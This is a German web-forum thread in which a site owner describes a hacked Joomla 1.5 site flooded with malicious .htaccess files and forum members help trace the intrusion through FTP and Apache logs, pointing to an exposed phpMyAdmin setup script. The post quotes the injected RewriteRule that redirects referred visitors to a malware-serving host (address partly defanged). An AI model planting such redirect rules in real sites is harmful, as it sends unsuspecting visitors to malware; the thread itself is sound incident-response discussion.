-
Seite mit .htaccess-Dateien zugemüllt
Hallo!
Edit: Sorry, jetzt ist mir das in die Kategorie 1.6 gerutscht – gehört in 1.5. (könnte man das verschieben?)
Man hat mir meine Joomla-Seite (1.5.23) gehackt und mit einigen hundert .htaccess-Dateien zugemüllt, die alle auf eine andere Seite weiterleiten, die dann einen Trojaner zu setzen versucht.
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://
RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
RewriteRule . http: // tonycar . com / r / 404 . php?%{REMOTE_ADDR}
(Lücken von mir)
Ging jetzt drei Tage hinternander so – mit wechselnden Adressen.
Hab jetzt mal dicht gemacht und werd wohl neu anfangen müssen. (Auf jeden Fall mit neuen Datenbanken & Passwörtern.)
Wär nur vorher ganz interessant, ob einem von euch in letzter Zeit das auch passiert ist. Ich selbst komme sicher nicht auf die Lücke. Und bevor ich noch mal denselben Mist mache.
Wär nett...
praktiker
Geändert von praktiker (11.06.2011 um 04:10 Uhr)
-
-
Wohnt hier
Lies auf jeden Fall die FAQ Punkt 2.6 und beherzige jedes Wort von "flottes liste".
Es wäre schon wichtig, die Lücke zu finden, ob es eine der eingesetzten Extensions ist oder ob dein PC infiziert ist und so der ftp-Zugang offen war. Scheint mir am wahrscheinlichsten.
-
-
Dank dir, oldlady.
Ich bin ein großer Freund von flottes Tipps. (Soweit ich sie verstehe.)
Und natürlich habe ich meine Site auch nicht jahrelang ohne .htaccess-Datei[en] betrieben.
Aber es hat mich nun mal erwischt.
Meinen Surf-PC hab ich auch mit allen Mitteln durchsucht, heute Nacht sogar ein älteres Image drübergebügelt, um sicher zu gehen. Und wieder durchsucht.
Mir blieb aber nichts anderes übrig, als die Site auf die Festplatte zu ziehen und dann platt zu machen, nachdem das Zumüllen nicht aufhörte. Ich kam dann ja auch immer wieder nicht mehr ran, weil die Umleitung auf "tonys car" immer wieder drin war. War ja wie beim Zauberlehrling, das Ganze. Das übersteigt meine Fähigkeiten bei weitem.
Ich habe jetzt mal neue Datenbanken mit neuen Passwörtern angelegt und muss mal versuchen, ob ich das Teil hier zuhause in der Testumgebung aufbekomme...
Falls also tatsächlich noch jemand das unangenehme Erlebnis gehabt haben sollte (wünsche es keinem)...
Danke!
praktiker
-
-
Irgendwo ist eine Lücke... solange du die nicht findest... stocherst du nur blind im Nebel herum.
Du musst deine Logs (access-log und ftp-log) prüfen und rausfinden wo der Angreifer eingestiegen ist.
Erst wenn du die Lücke gefunden und gestopft hast, macht neu aufsetzen Sinn....
-
-
Bin durchaus dabei, Skodi.
(Sollte aber langsam wieder ans Arbeiten denken. Das wird verdammt teuer.)
Immerhin habe ich festgestellt, dass jemand die ftp_logs vom 01.06.2011 bis einschließlich 07.06.2011 auf dem Webspace gelöscht hat. Ist also die hier relevante Zeit. Am 07.06.2011 habe ich das erste Problem festgestellt. Ich habe erst wieder ftp_logs ab 08.08.2011. Da ist das denen offensichtlich schon wurscht; vermutlich wegen des platzierten Skripts.
Tschüs erst mal!
praktiker
-
-
Wohnt hier
War Dein FTP Passwort sicher ?
und kannst du ausschliessen , dass es ausgespäht wurde ?
Setzt du vielleicht WSFTP ein ?
Da gab es m.E. eine unsichere Version.
-
-
Hallo Andreas,
FTP-Passwort: weiß nicht, ob man ausschließen kann, da abgehört zu werden; ich nehme FileZilla.
Ich habe jetzt auch noch ein zwei Monate altes Image der System-Platte drübergebügelt, für den Fall, dass mir da ein Trojaner draufgekommen sein sollte. UNd dann die Passwörter geändert. (So ganz unvorsichtig bin nicht. Kaspersky läuft bei mir immer. Spybot. Hin und wieder andere Malware-Scanner.)
Ich habe jetzt erst mal die Logfiles lesen gelernt. Und die Sache ist die: Diesen Monat war außer mir niemand über ftp auf der Seite; da sind nur meine IPs von zuhause und denen des Kasservers von all-inklusive. (Alle verschiedenen gezählt und die Endsummen mit der Zahl der Einträge verglichen.)
Interessant dazu: http://wu-ftpd.therockgarden.ca/man/xferlog . html.
Das Theater begann erst am 7.06. Vielleicht kann einer von den Cracks hier Schlüsse ziehen. Sind das dann Skripte, Exploits, ...?
Mit den access_logs sieht's anders aus; die sind ja viel unübersichtlicher. Aber ich habe so Sachen wie "xpymep.exe" entdeckt, "base64_decode" etc. Wenn da einer eine Lücke entdeckt hat. Da habe ich aber erst angefangen. Wenn da jemand was weiß...
Nehme weiterhin jeden Tipp dankbar entgegen.
Bis dann
praktiker
-
-
Moderator
Suche in den Apache-Logs nach "POST"-Anweisungungen. Sieh Dir die dortigen IPs an. Z.B. hiermit kansst Du leicht erkennen, ob das typische ausländische IPs waren. Filtere die Logs dann nach den IPs, um den Bewegungsablauf zu erkennen. Achte auf die Links die aufgerufen wurden und prüfe, ob die Dateien zum Joomla gehören. Oft werden eingeschleuste Shellscripte aufgerufen etc.pp. Filtere nach solchen Namen und Du stösst ggf. auf weitere IPs, nach denen Du dann wieder filtern kannst...
Schritt für Schritt entdeckt man dann die einzelnen Aktivitäten.
-
Erhielt Danksagungen von:
-
Hallo Uwe!
Bist einfach unschlagbar! Dank deines Tipps konnte ich mir die access_logs etwas zielsicherer vornehmen. Pass mal auf: Was hat einer hier drin verloren?
195.186.xx.xx - - [08/Jun/2011:18:16:43 +0200] "GET /phpmyadmin2/scripts/setup.php HTTP/1.1" 200 14080 "-" "-"
195.186.xx.xx - - [08/Jun/2011:18:16:44 +0200] "POST /phpmyadmin2/scripts/setup.php HTTP/1.1" 200 24192 "-" "-"
Der kam in den letzten Tagen öfter. Aber hier ist der Clou: Ich habe mir am 8.06. Gottseidank notiert, wann eine der – ich weiß nicht – 300, 400 .htaccess-Dateien gesetzt wurden:
– um 18:17:15
Alter Verwalter!
Ich weiß jetzt nicht, ob das was bedeutet, aber merkwürdig ist, dass ich ausgerechnet in besagter setup.php folgenden Eintrag finde:
if ($vals['AllowArbitraryServer']) {
message('warning', 'Arbitrary server connection might be dangerous as it might allow access to internal servers that are not reachable from outside.');
}
(Die Variable könnte also jemandem den Zugang zu internen Servern ermöglichen, die sonst von außen nicht zu erreichen sind.)
Jetzt wär ich echt für kundige Meinungen dankbar.
Und ja, ich weiß, phpmyadmin war womöglich nicht die neueste Version und ich hätte es auch über den Kasserver einsetzen können (obwohl, vielleicht damals noch nicht . . . )
Aber erst noch mal ein Dankeschön an dich, Uwe!
Tschüs!
praktiker
-
-
Moderator
In letzter Zeit liefen massenhafte Anfragen an viele verschiedene typische phpmyadmin-URLs. Wenn der Webspace so konfiguriert ist, das phpMyAdmin mit diesen Links funktioniert und gar die setup-Scripte erreichbar sind oder kein .htacess-Passwortschutz gesetzt ist, na dann Gute Nacht :-(
Derartige Scripte sollten im Webspace immer sehr penibel abgesichert sein und niemals(!) ohne Passwortschutz laufen - auch nicht ohne SSL. Darüber hinaus sind gerade bei phpmyadmin bestimmte Verzeichnisse (wie z.B. "scripts") zu entfernen.
Zu Deinem Log: Der Angreifer konnte auf die Rescourcen zugreifen (Code 200) und hat darüber auch Daten zum Server gesendet.
-
Stichworte
Berechtigungen
- Neue Themen erstellen: Nein
- Themen beantworten: Nein
- Anhänge hochladen: Nein
- Beiträge bearbeiten: Nein
Foren-Regeln
LinkBack URL
About LinkBacks
Zitieren
Lesezeichen